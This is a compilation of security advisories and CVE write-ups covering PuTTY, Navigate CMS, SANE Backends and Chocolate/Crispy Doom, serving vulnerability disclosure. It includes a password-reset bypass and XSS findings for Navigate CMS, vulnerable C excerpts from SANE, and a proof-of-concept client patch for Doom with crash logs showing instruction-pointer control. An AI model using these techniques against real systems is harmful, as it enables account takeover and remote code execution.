PuTTY 0.68 through 0.73 has an Observable Discrepancy leading to an information leak in the algorithm negotiation. This allows man-in-the-middle attackers to target initial connection attempts (where no host key for the server has been cached by the client).

CVE-2020-14002: PuTTY Change Log

An issue was discovered in Navigate CMS 2.8 and 2.9 r1433. The query parameter fid on the resource navigate.php does not perform sufficient data validation and/or encoding, making it vulnerable to reflected XSS.

I recently took part in a live bug hunting event:

> — OnSecurity - We're Hiring! (@HackersOnDemand) June 9, 2020

As part of these event, we reviewed the product Navigate CMS. In order to perform this review I setup a local instance of this tool, using version v2.9 r1433 (2020/06).

While taking part of this event, I managed to help identify several findings:

*   User enumeration
*   Session information leakage
*   User password reset vulnerability
*   Store Cross-Site Scripting (XSS)
*   Reflected Cross-Site Scripting (XSS)

**User Enumeration - CVE-2020-14016**

Navigate CMS has a _Forgot password?_ feature, which allows a user to reset their password if they forgot what their current password is.

Navigate CMS login page with _Forgot password?_ link.

In order to use this feature the user supplies either their username associated with their account, or the email address which is associate with their account.

Forgot password feature.

When entering the username or email address of a non-existent user, it produces and error stating that the user couldn't be found:

Result of providing details of non-existent user.

When reviewing the HTTP response it can clearly be seen that the HTTP response responds with the message _not\_found_ in the response body:

**HTTP request:**

    POST /navigate/login.php HTTP/1.1
    Host: 192.168.0.130
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Csrf-Token: 236c7e771d9d104865dd84a095910bdeef4434443f7c55be1cdff82bb6037b7f
    X-Requested-With: XMLHttpRequest
    Content-Length: 36
    Origin: http://192.168.0.130
    Connection: close
    Referer: http://192.168.0.130/navigate/login.php
    Cookie: PHPSESSID=6ls0ko8kgh9fikeqt0a78cmp0t; navigate-tinymce-scroll=%7B%7D; NVSID_ff0d48a629500e15=6ls0ko8kgh9fikeqt0a78cmp0t
    
    action=forgot-password&value=invalid
    

**HTTP Response**

    HTTP/1.1 200 OK
    Date: Wed, 10 Jun 2020 16:55:33 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Set-Cookie: NVSID_ff0d48a629500e15=6ls0ko8kgh9fikeqt0a78cmp0t; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Set-Cookie: NVSID_ff0d48a629500e15=6ls0ko8kgh9fikeqt0a78cmp0t; expires=Wed, 10-Jun-2020 17:55:33 GMT; Max-Age=3600; path=/; domain=192.168.0.130; HttpOnly; SameSite=Lax
    Set-Cookie: PHPSESSID=6ls0ko8kgh9fikeqt0a78cmp0t; expires=Wed, 10-Jun-2020 17:55:33 GMT; Max-Age=3600; path=/; domain=192.168.0.130; HttpOnly; SameSite=Lax
    X-Csrf-Token: 236c7e771d9d104865dd84a095910bdeef4434443f7c55be1cdff82bb6037b7f
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html; charset=utf-8
    Content-Length: 9
    
    not_found
    

Using this one can either use something such as a wordlist to try enumeration which users exist on the system:

User enumeration of the _Forgot password?_ feature.

**Session Information Leakage - CVE-2020-14017**

Navigate CMS stores session information in plaintext files on the server in the webroot. These files are then publicly available to un-authenticated users. As part of the setup, there is an option to copy/install the appropriate _.htaccess_ files used to prevent access to this directory and files. However it appears that this doesn't prevent access with later versions of Apache HTTPD.

Depending how the server has been configured, it could be possible to view the contents of the directory:

Directory list of the directory private/sessions which contains all session files.

Upon navigating to one of the session files (most preferably the most recent), one is able to view details and sensitive information (such as CSRF tokens) which are associated with the session:

Details of session file.

If directory listing has been disabled on the webserver (such as via Apache configuration), an attacker is still able to access these files without authentication, however they would need to bruteforce the session IDs to find existing sessions and thus the existing session files:

Bruteforcing of session files.

**User Password Reset Vulnerability - CVE-2020-14015**

The _Forgot password?_ feature allows a user to reset their password. When a user successfully enters their username or email address in the forgot password feature, an email is sent the user which contains a password reset link. This link contains an _activation code_, which allows the user to then reset the password associated with their account.

When providing an invalid code, the user is presented with the login screen:

Login screen with invalid password activation code.

However a flaw exists when no code is presented, the user is prompted for a new password:

Password reset for now password activation code.

And setting the password results in success:

Password reset successful.

Upon further investigation, the reason is that when a user is created, their account is created without an activation code:

Database after user created.

When no code is supplied in the password reset process flow, the first user without an activation key will be matched and thus have their password reset.

**Stored Cross-Site Scripting - CVE-2020-14018**

While there is HTML encoding on _User_ field in the Users / Edit page, there is not sufficient encoding on the _E-Mail_ field, these leaves it vulnerable to a store XSS vulnerability:

Stored XSS from E-Mail field on the Users / Edit page.

As stated the _User_ field is appropriate HTML encoded, preventing any XSS vulnerability from this field on this page:

HTML encoding of the _User_ field.

However the E-Mail field is does not have sufficient HTML encoding, resulting in a stored XSS vulnerability:

XSS vulnerability in the _E-Mail_ field.

This stored XSS vulnerability is persisted and present from both the _User_ as well as the _E-Mail_ fields when viewing users on the _Users_ page:

Stored XSS from the _User_ field.

Stored XSS from the _E-Mail_ field.

**Reflected Cross-Site Scripting - CVE-2020-14014**

On the landing page once the user authenticates, there is a resource _/nagivate.php_ which can take the query parameter _fid_. The value from this parameter is reflected back on the page, without having appropriate validation or HTML encoding. This makes the page vulnerable to reflected XSS:

Reflected XSS from the vulnerable _fid_ query parameter.

This is since the value is reflected to a link in the top right corner of the page:

Reflected link contain the reflected XSS.

**Resolution**

Fixed as of version v2.9.1 r1487 (2020/06).

**Vendor Notification**

*   10 June 2020 - Initial contact with the vendor, indicating wish to share findings with vendor before disclosing publicly.
*   11 June 2020 - Received response from vendor expressing wish to obtain information about findings.
*   11 June 2020 - Forwarded findings to vendor.
*   17 June 2020 - Vendor shared fixes with myself and asked me to review the fixes.
*   21 June 2020 - Reviewed fixes and confirmed with vendor.
*   22 June 2020 - Vendor confirmed new version and approved public disclosure of findings.

CVE-2020-14014: Navigate CMS

An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-082.

**Summary**

SANE Backends contains several memory corruption vulnerabilities which can be triggered by a malicious device or computer that is connected to the same network. The vulnerabilities are triggered when an application such as simple-scan searches the network for scanners. In the specific case of simple-scan, this happens immediately when simple-scan starts, so there isn’t even any need to trick the user into thinking that the scanner is genuine so that they will click on it.

We have also identified some other vulnerabilities in SANE Backends, which are less severe because they _do_ require the user to click the “Scan” button after connecting to a malicious device.

**Product**

SANE Backends

**Tested Version**

libsane1 1.0.27-1~experimental3ubuntu2.2, tested on Ubuntu 18.04.4 LTS with simple-scan 3.28.0-0ubuntu1.

**Details****Issue 1 (GHSL-2020-075, CVE-2020-12867): null pointer dereference in sanei_epson_net_read**

The function sanei_epson_net_read has buggy code for handling the situation where it receives a response with an unexpected size:

    /* receive net header */
    size = sanei_epson_net_read_raw(s, header, 12, status);
    if (size != 12) {
      return 0;
    }
    
    if (header[0] != 'I' || header[1] != 'S') {
      DBG(1, "header mismatch: %02X %02x\n", header[0], header[1]);
      *status = SANE_STATUS_IO_ERROR;
      return 0;
    }
    
    size = be32atoh(&header[6]);  <===== size is controlled by attacker
    
    DBG(23, "%s: wanted = %lu, available = %lu\n", __func__,
      (u_long) wanted, (u_long) size);
    
    *status = SANE_STATUS_GOOD;
    
    if (size == wanted) {
    
      DBG(15, "%s: full read\n", __func__);
    
      read = sanei_epson_net_read_raw(s, buf, size, status);
    
      if (s->netbuf) {
        free(s->netbuf);
        s->netbuf = NULL;
        s->netlen = 0;
      }
    
      if (read < 0) {
        return 0;
      }
    
    /*  } else if (wanted < size && s->netlen == size) { */
    } else {
      DBG(23, "%s: partial read\n", __func__);
    
      read = sanei_epson_net_read_raw(s, s->netbuf, size, status);  <===== s->netbuf could be NULL
      if (read != size) {
        return 0;
      }
    
      s->netlen = size - wanted;
      s->netptr += wanted;
      read = wanted;
    
      DBG(23, "0,4 %02x %02x\n", s->netbuf[0], s->netbuf[4]);  <===== s->netbuf could be NULL
      DBG(23, "storing %lu to buffer at %p, next read at %p, %lu bytes left\n",
        (u_long) size, s->netbuf, s->netptr, (u_long) s->netlen);
    
      memcpy(buf, s->netbuf, wanted);
    }
    
    return read;
    

Notice that the value of size is read from an incoming message, so an attacker can set it to any value they like. In the else branch, which handles the case where size != wanted, there is no check that s->netbuf is large enough for size bytes. This could potentially lead to a buffer overflow. However, our proof-of-concept exploit for this bug triggers a case where s->netbuf hasn’t even been initialized so the program crashes due to a null pointer dereference, rather than a buffer overflow.

**Impact**

This issue may lead to remote denial of service, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building. Because the vulnerability causes simple-scan to crash as soon as it starts, it makes the application unusable.

**Issue 2 (GHSL-2020-079, CVE-2020-12866): null pointer dereference in epsonds_net_read**

The function epsonds_net_read has buggy code for handling the situation where it receives a response with an unexpected size:

    /* receive net header */
    size = epsonds_net_read_raw(s, header, 12, status);
    if (size != 12) {
      return 0;
    }
    
    if (header[0] != 'I' || header[1] != 'S') {
      DBG(1, "header mismatch: %02X %02x\n", header[0], header[1]);
      *status = SANE_STATUS_IO_ERROR;
      return 0;
    }
    
    // incoming payload size
    size = be32atoh(&header[6]);
    
    DBG(23, "%s: wanted = %lu, available = %lu\n", __func__,
      (u_long) wanted, (u_long) size);
    
    *status = SANE_STATUS_GOOD;
    
    if (size == wanted) {
    
      DBG(15, "%s: full read\n", __func__);
    
      if (size) {
        read = epsonds_net_read_raw(s, buf, size, status);
      }
    
      if (s->netbuf) {
        free(s->netbuf);
        s->netbuf = NULL;
        s->netlen = 0;
      }
    
      if (read < 0) {
        return 0;
      }
    
    } else if (wanted < size) {
    
      DBG(23, "%s: long tail\n", __func__);
    
      read = epsonds_net_read_raw(s, s->netbuf, size, status);  <===== no bounds check
      if (read != size) {
        return 0;
      }
    
      memcpy(buf, s->netbuf, wanted);
      read = wanted;
    
      free(s->netbuf);
      s->netbuf = NULL;
      s->netlen = 0;
    
    } else {
    
      DBG(23, "%s: partial read\n", __func__);
    
      read = epsonds_net_read_raw(s, s->netbuf, size, status);
      if (read != size) {
        return 0;
      }
    
      s->netlen = size - wanted;  <===== negative integer overflow (because size < wanted)
      s->netptr += wanted;
      read = wanted;
    
      DBG(23, "0,4 %02x %02x\n", s->netbuf[0], s->netbuf[4]);
      DBG(23, "storing %lu to buffer at %p, next read at %p, %lu bytes left\n",
        (u_long) size, s->netbuf, s->netptr, (u_long) s->netlen);
    
      memcpy(buf, s->netbuf, wanted);  <===== no bounds check
    }
    
    return read;
    

This code is very similar to the code in epson2_net.c (see issue 1) and has similar bugs. The first of these is a NULL pointer exception at epsonds-net.c, line 160.

**Impact**

This issue may lead to remote denial of service, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building. Because the vulnerability causes simple-scan to crash as soon as it starts, it makes the application unusable.

**Issue 3 (GHSL-2020-080, CVE-2020-12861): heap buffer overflow in epsonds_net_read**

This bug is in the same function as issue 2: epsonds_net_read. There is a heap buffer overflow at epsonds-net.c, line 135. The value of size is controlled by the attacker, so an arbitrary amount of attacker-controlled data is written to s->netbuf.

**Impact**

This issue may lead to remote code execution, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building.

**Issue 4 (GHSL-2020-081, CVE-2020-12864): reading uninitialized data in epsonds_net_read**

This bug is in the same function as issue 2: epsonds_net_read. The memcpy at epsonds-net.c, line 164 can read uninitialized data. The value of size is controlled by the attacker, so the attacker can specify that size == 0. Since s->netbuf is a newly allocated heap buffer, it contains uninitialized memory.

**Impact**

By itself, the severity of this issue is very low. However, it may be very useful to an attacker who is attempting to exploit one of the buffer overflow vulnerabilities, such as issue 3, because it may enable the attacker to obtain the ASLR offsets of the program.

**Issue 5 (GHSL-2020-082, CVE-2020-12862): out-of-bounds read in decode_binary**

The function decode_binary has an out-of-bounds read:

    /* h000 */
    static char *decode_binary(char *buf)
    {
      char tmp[6];
      int hl;
    
      memcpy(tmp, buf, 4);
      tmp[4] = '\0';
    
      if (buf[0] != 'h')
        return NULL;
    
      hl = strtol(tmp + 1, NULL, 16);
      if (hl) {
    
        char *v = malloc(hl + 1);
        memcpy(v, buf + 4, hl);
        v[hl] = '\0';
    
        return v;
      }
    
      return NULL;
    }
    

The value of hl is controlled by the attacker and can be any value between 0 and 0xFFF (4095). buf is a pointer to a 64 byte stack buffer (rbuf in esci2_cmd), so the memcpy at line 273 can copy up to 4095 bytes from the stack into the newly allocated buffer.

**Impact**

By itself, the severity of this issue is very low. However, it may be very useful to an attacker who is attempting to exploit one of the buffer overflow vulnerabilities, such as issue 3, because it may enable the attacker to obtain the ASLR offsets of the program.

esci2_check_header uses sscanf to read a number from the message:

    /* INFOx0000100#.... */
    
    /* read the answer len */
    if (buf[4] != 'x') {
      DBG(1, "unknown type in header: %c\n", buf[4]);
      return 0;
    }
    
    err = sscanf(&buf[5], "%x#", more);
    if (err != 1) {
      DBG(1, "cannot decode length from header\n");
      return 0;
    }
    

buf is a pointer to a 64 byte stack buffer (rbuf in esci2_cmd), the contents of which are entirely controlled by the attacker. If the attacker fills the buffer with the character ‘0’, then sscanf will read off the end of the buffer. If the characters beyond the buffer are valid hexadecimal digits, then they will be converted to a number and written to the variable named more. The value of more is included in the next message that is sent to the malicious device, so this issue is an information leak vulnerability.

**Impact**

This issue may lead to remote information disclosure, where “remote” means a device or computer connected to the same network as the victim. In practice, though, this issue is very low severity, because the byte immediately following the buffer is usually not a valid hexadecimal digit, so no information disclosure occurs.

**Issue 7 (GHSL-2020-084, CVE-2020-12865): buffer overflow in esci2_img**

This issue requires the user to click the “Scan” button, so it is a one-click vulnerability, rather than a zero-click vulnerability. The function esci2_img has a heap buffer overflow:

    SANE_Status
    esci2_img(struct epsonds_scanner *s, SANE_Int *length)
    {
      SANE_Status status = SANE_STATUS_GOOD;
      SANE_Status parse_status;
      unsigned int more;
      ssize_t read;
    
      *length = 0;
    
      if (s->canceling)
        return SANE_STATUS_CANCELLED;
    
      /* request image data */
      eds_send(s, "IMG x0000000", 12, &status, 64);
      if (status != SANE_STATUS_GOOD) {
        return status;
      }
    
      /* receive DataHeaderBlock */
      memset(s->buf, 0x00, 64);
      eds_recv(s, s->buf, 64, &status);
      if (status != SANE_STATUS_GOOD) {
        return status;
      }
    
      /* check if we need to read any image data */
      more = 0;
      if (!esci2_check_header("IMG ", (char *)s->buf, &more)) {  <===== attacker controls value of `more`
        return SANE_STATUS_IO_ERROR;
      }
    
      /* this handles eof and errors */
      parse_status = esci2_parse_block((char *)s->buf + 12, 64 - 12, s, &img_cb);
    
      /* no more data? return using the status of the esci2_parse_block
       * call, which might hold other error conditions.
       */
      if (!more) {
        return parse_status;
      }
    
      /* ALWAYS read image data */
      if (s->hw->connection == SANE_EPSONDS_NET) {
        epsonds_net_request_read(s, more);
      }
    
      read = eds_recv(s, s->buf, more, &status);  <===== heap buffer overflow
      if (status != SANE_STATUS_GOOD) {
        return status;
      }
    
      if (read != more) {
        return SANE_STATUS_IO_ERROR;
      }
    
      /* handle esci2_parse_block errors */
      if (parse_status != SANE_STATUS_GOOD) {
        return parse_status;
      }
    
      DBG(15, "%s: read %lu bytes, status: %d\n", __func__, (unsigned long) read, status);
    
      *length = read;
    
      if (s->canceling) {
        return SANE_STATUS_CANCELLED;
      }
    
      return SANE_STATUS_GOOD;
    }
    

**Impact**

This issue may lead to remote code execution, where “remote” means a device or computer connected to the same network as the victim. For example, in a typical office environment the malicious device would need to be somewhere inside the building.

**CVEs**

*   GHSL-2020-075 -> CVE-2020-12867
*   GHSL-2020-079 -> CVE-2020-12866
*   GHSL-2020-080 -> CVE-2020-12861
*   GHSL-2020-081 -> CVE-2020-12864
*   GHSL-2020-082 -> CVE-2020-12862
*   GHSL-2020-083 -> CVE-2020-12863
*   GHSL-2020-084 -> CVE-2020-12865

**Coordinated Disclosure Timeline**

This report was subject to the GHSL coordinated disclosure policy.

*   2020-04-21 reported: https://gitlab.com/sane-project/backends/-/issues/279
*   2020-04-21 acknowledged by Olaf Meeuwissen
*   2020-05-14 CVE request submitted to Mitre
*   2020-05-17 bugs announced on http://www.sane-project.org/ and on their mailing list
*   2020-05-30 issue 279 is derestricted. The original PoC is attached to the issue and is therefore also publicly visible.

**Resources**

*   https://gitlab.com/sane-project/backends/-/issues/279
*   https://alioth-lists.debian.net/pipermail/sane-announce/2020/000041.html
*   https://github.com/github/securitylab/tree/38b182e96a48f19b412039c0b321d6faec2b5c55/SecurityExploits/SANE/epsonds\_CVE-2020-12861

**Credit**

These issues were discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

You can contact the GHSL team at securitylab@github.com, please include the relevant GHSL IDs in any communication regarding these issues.

CVE-2020-12862: GHSL-2020-075, GHSL-2020-079, GHSL-2020-080, GHSL-2020-081, GHSL-2020-082, GHSL-2020-083, GHSL-2020-084: Multiple vulnerabilities in SANE Backends (DoS, RCE)

An out-of-bounds read in SANE Backends before 1.0.30 may allow a malicious device connected to the same local network as the victim to read important information, such as the ASLR offsets of the program, aka GHSL-2020-081.

CVE-2020-12864: GHSL-2020-075, GHSL-2020-079, GHSL-2020-080, GHSL-2020-081, GHSL-2020-082, GHSL-2020-083, GHSL-2020-084: Multiple vulnerabilities in SANE Backends (DoS, RCE)

The server in Chocolate Doom 3.0.0 and Crispy Doom 5.8.0 doesn't validate the user-controlled num_players value, leading to a buffer overflow. A malicious user can overwrite the server's stack.

**Background**

Version of Chocolate Doom:

*   Chocolate Doom 3.0.0 (from the website)
*   Chocolate Doom git revision 5bf73c4
*   confirmed also in: Crispy Doom 5.8.0

Operating System and version: Ubuntu 18.04 x86-64

Compilation: CFLAGS="-fsanitize=address -ggdb -O0" LDFLAGS="-fsanitize=address" ./configure --prefix=pwd/bin

Game: (Doom/Heretic/Hexen/Strife/other) FreeDM

**Bug description**

When the client starts the game, it sends its settings using the NET_WriteSettings function. The server receives and parses it in the NET_ReadSettings function. The settings packet consist of the num_players integer. This value is used as an maximum value while iterating over corresponding settings and writing them to the player_classes fixed sized (8 elements) array.

    File: src/net_structrw.c
    091: boolean NET_ReadSettings(net_packet_t *packet, net_gamesettings_t *settings)
    092: {
    093:     boolean success;
    094:     int i;
    095: 
    096:     success = NET_ReadInt8(packet, (unsigned int *) &settings->ticdup)
    (...)
    111:            && NET_ReadInt8(packet, (unsigned int *) &settings->num_players)
    (...)
    119:     for (i = 0; i < settings->num_players; ++i)
    120:     {
    121:         if (!NET_ReadInt8(packet,
    122:                           (unsigned int *) &settings->player_classes[i]))
    123:         {
    124:             return false;
    125:         }
    126:     }
    127: 
    128:     return true;
    129: }
    

    File: src/net_defs.h
    37: #define NET_MAXPLAYERS 8
    [...]
    186: typedef struct
    187: {
    [...]
    211: 
    212:     int player_classes[NET_MAXPLAYERS];
    213: 
    214: } net_gamesettings_t;
    

The client can send any byte value and fill the packet with additional bytes to write outside the array and cause stack-based buffer overflow.

PoC:  
Modified client's code:

    --- a/src/net_structrw-b.c
    +++ b/src/net_structrw.c
    @@ -79,13 +79,16 @@ void NET_WriteSettings(net_packet_t *packet, net_gamesettings_t *settings)
         NET_WriteInt32(packet, settings->timelimit);
         NET_WriteInt8(packet, settings->loadgame);
         NET_WriteInt8(packet, settings->random);
    -    NET_WriteInt8(packet, settings->num_players);
    +    NET_WriteInt8(packet, settings->num_players+100);
         NET_WriteInt8(packet, settings->consoleplayer);
     
         for (i = 0; i < settings->num_players; ++i)
         {
             NET_WriteInt8(packet, settings->player_classes[i]);
         }
    +    for (i = 0; i < 100; i++) {
    +       NET_WriteInt8(packet, 0xaa);
    +    }
     }
    

When all of the clients are connected and the owner starts the game, the server crashes.

    ./chocolate-server
    ./chocolate-doom -iwad ~/freedm.wad -window -nomouse -connect 127.0.0.1 -nodes 1
    

Chocolate Doom ASAN:

    ==22788==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff357bea94 at pc 0x560b7e6bfb06 bp 0x7fff357be9a0 sp 0x7fff357be990
    WRITE of size 4 at 0x7fff357bea94 thread T0
        #0 0x560b7e6bfb05 in NET_ReadInt8 /home/mmm/projects/chocolate-doom-3.0.0/src/net_packet.c:78
        #1 0x560b7e6cb992 in NET_ReadSettings /home/mmm/projects/chocolate-doom-3.0.0/src/net_structrw.c:121
        #2 0x560b7e6c7656 in NET_SV_ParseGameStart /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:921
        #3 0x560b7e6c91c3 in NET_SV_Packet /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:1408
        #4 0x560b7e6ca87f in NET_SV_Run /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:1813
        #5 0x560b7e6bf102 in NET_DedicatedServer /home/mmm/projects/chocolate-doom-3.0.0/src/net_dedicated.c:74
        #6 0x560b7e6bcf4e in D_DoomMain /home/mmm/projects/chocolate-doom-3.0.0/src/d_dedicated.c:45
        #7 0x560b7e6ba254 in main /home/mmm/projects/chocolate-doom-3.0.0/src/i_main.c:48
        #8 0x7f1b68c4fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #9 0x560b7e6ba0e9 in _start (/home/mmm/projects/chocolate-doom-3.0.0/bin-asan/bin/chocolate-server+0x60e9)
    
    Address 0x7fff357bea94 is located in stack of thread T0 at offset 132 in frame
        #0 0x560b7e6c758a in NET_SV_ParseGameStart /home/mmm/projects/chocolate-doom-3.0.0/src/net_server.c:909
    
      This frame has 1 object(s):
        [32, 132) 'settings' <== Memory access at offset 132 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/mmm/projects/chocolate-doom-3.0.0/src/net_packet.c:78 in NET_ReadInt8
    Shadow bytes around the buggy address:
      0x100066aefd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefd40: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00
    =>0x100066aefd50: 00 00[04]f2 f2 f2 00 00 00 00 00 00 00 00 00 00
      0x100066aefd60: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 00 00 00 00
      0x100066aefd70: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x100066aefd80: f2 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00
      0x100066aefd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100066aefda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==22788==ABORTING
    

Chocolate Doom without asan:

    $ bin-clean/bin/chocolate-server 
    Chocolate Doom standalone dedicated server
    zone memory: Using native C allocator.
    Warning: Failed to resolve address for master server: master.chocolate-doom.org:2342
    *** stack smashing detected ***: <unknown> terminated
    Aborted
    

Chocolate Doom without stack protection:

    $ gdb bin-clean/bin/chocolate-server 
    GNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git
    Copyright (C) 2018 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from bin-clean/bin/chocolate-server...done.
    (gdb) r
    Starting program: /home/mmm/projects/chocolate-doom-3.0.0/bin-clean/bin/chocolate-server 
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Chocolate Doom standalone dedicated server
    zone memory: Using native C allocator.
    Warning: Failed to resolve address for master server: master.chocolate-doom.org:2342
    
    Program received signal SIGSEGV, Segmentation fault.
    0x000000aa000000aa in ?? ()
    (gdb) i r
    rax            0x5555557682a0	93824994411168
    rbx            0xaa000000aa	730144440490
    rcx            0x5555557601c0	93824994378176
    rdx            0x0	0
    rsi            0xffffffff	4294967295
    rdi            0x7ffff7ff8170	140737354105200
    rbp            0xaa000000aa	0xaa000000aa
    rsp            0x7fffffffdee0	0x7fffffffdee0
    r8             0xa84	2692
    r9             0x7fffffffdd20	140737488346400
    r10            0x7fffffffdce0	140737488346336
    r11            0x246	582
    r12            0xaa000000aa	730144440490
    r13            0xaa000000aa	730144440490
    r14            0xaa000000aa	730144440490
    r15            0xaa000000aa	730144440490
    rip            0xaa000000aa	0xaa000000aa
    eflags         0x10202	[ IF RF ]
    cs             0x33	51
    ss             0x2b	43
    ds             0x0	0
    es             0x0	0
    fs             0x0	0
    gs             0x0	0
    (gdb) i stack
    #0  0x000000aa000000aa in ?? ()
    #1  0x000000aa000000aa in ?? ()
    #2  0x000000aa000000aa in ?? ()
    #3  0x000000aa000000aa in ?? ()
    #4  0x000000aa000000aa in ?? ()
    #5  0x000000aa000000aa in ?? ()
    #6  0x000000aa000000aa in ?? ()
    #7  0x000000aa000000aa in ?? ()
    #8  0x000000aa000000aa in ?? ()
    #9  0x000000aa000000aa in ?? ()
    #10 0x000000aa000000aa in ?? ()
    #11 0x000000aa000000aa in ?? ()
    #12 0x000000aa000000aa in ?? ()
    #13 0x000000aa000000aa in ?? ()
    #14 0x000000aa000000aa in ?? ()
    #15 0x000000aa000000aa in ?? ()
    #16 0x000000aa000000aa in ?? ()
    #17 0x000000aa000000aa in ?? ()
    #18 0x000000aa000000aa in ?? ()
    #19 0x000000aa000000aa in ?? ()
    #20 0x000000aa000000aa in ?? ()
    #21 0x000000aa000000aa in ?? ()
    #22 0x000000aa000000aa in ?? ()
    #23 0x000000aa000000aa in ?? ()
    #24 0x000000aa000000aa in ?? ()
    #25 0x000000aa000000aa in ?? ()
    #26 0x00007ffff4dcabb0 in __pthread_init_array () from /lib/x86_64-linux-gnu/libpthread.so.0
    #27 0x0000000000000000 in ?? ()
    

Crispy Doom ASAN

    ./chocolate-doom -iwad ~/freedm.wad -window -nomouse -connect 127.0.0.1 -nodes 1
    ./crispy-server
    

    =================================================================
    ==13660==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0a90d2d4 at pc 0x55f3703f1acc bp 0x7ffc0a90d1e0 sp 0x7ffc0a90d1d0
    WRITE of size 4 at 0x7ffc0a90d2d4 thread T0
        #0 0x55f3703f1acb in NET_ReadInt8 /home/mmm/projects/crispy-doom/src/net_packet.c:78
        #1 0x55f3703fecca in NET_ReadSettings /home/mmm/projects/crispy-doom/src/net_structrw.c:121
        #2 0x55f3703f9d11 in NET_SV_ParseGameStart /home/mmm/projects/crispy-doom/src/net_server.c:972
        #3 0x55f3703fc17b in NET_SV_Packet /home/mmm/projects/crispy-doom/src/net_server.c:1535
        #4 0x55f3703fdb8d in NET_SV_Run /home/mmm/projects/crispy-doom/src/net_server.c:1946
        #5 0x55f3703f0fd0 in NET_DedicatedServer /home/mmm/projects/crispy-doom/src/net_dedicated.c:75
        #6 0x55f3703ea30e in D_DoomMain /home/mmm/projects/crispy-doom/src/d_dedicated.c:45
        #7 0x55f3703e73a2 in main /home/mmm/projects/crispy-doom/src/i_main.c:78
        #8 0x7f1a51de3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #9 0x55f3703e6eb9 in _start (/home/mmm/projects/crispy-doom/bin-asan/bin/crispy-server+0x10eb9)
    
    Address 0x7ffc0a90d2d4 is located in stack of thread T0 at offset 132 in frame
        #0 0x55f3703f9c1b in NET_SV_ParseGameStart /home/mmm/projects/crispy-doom/src/net_server.c:956
    
      This frame has 1 object(s):
        [32, 132) 'settings' <== Memory access at offset 132 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/mmm/projects/crispy-doom/src/net_packet.c:78 in NET_ReadInt8
    Shadow bytes around the buggy address:
      0x100001519a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519a40: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00
    =>0x100001519a50: 00 00 00 00 00 00 00 00 00 00[04]f2 f2 f2 00 00
      0x100001519a60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
      0x100001519a70: 04 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
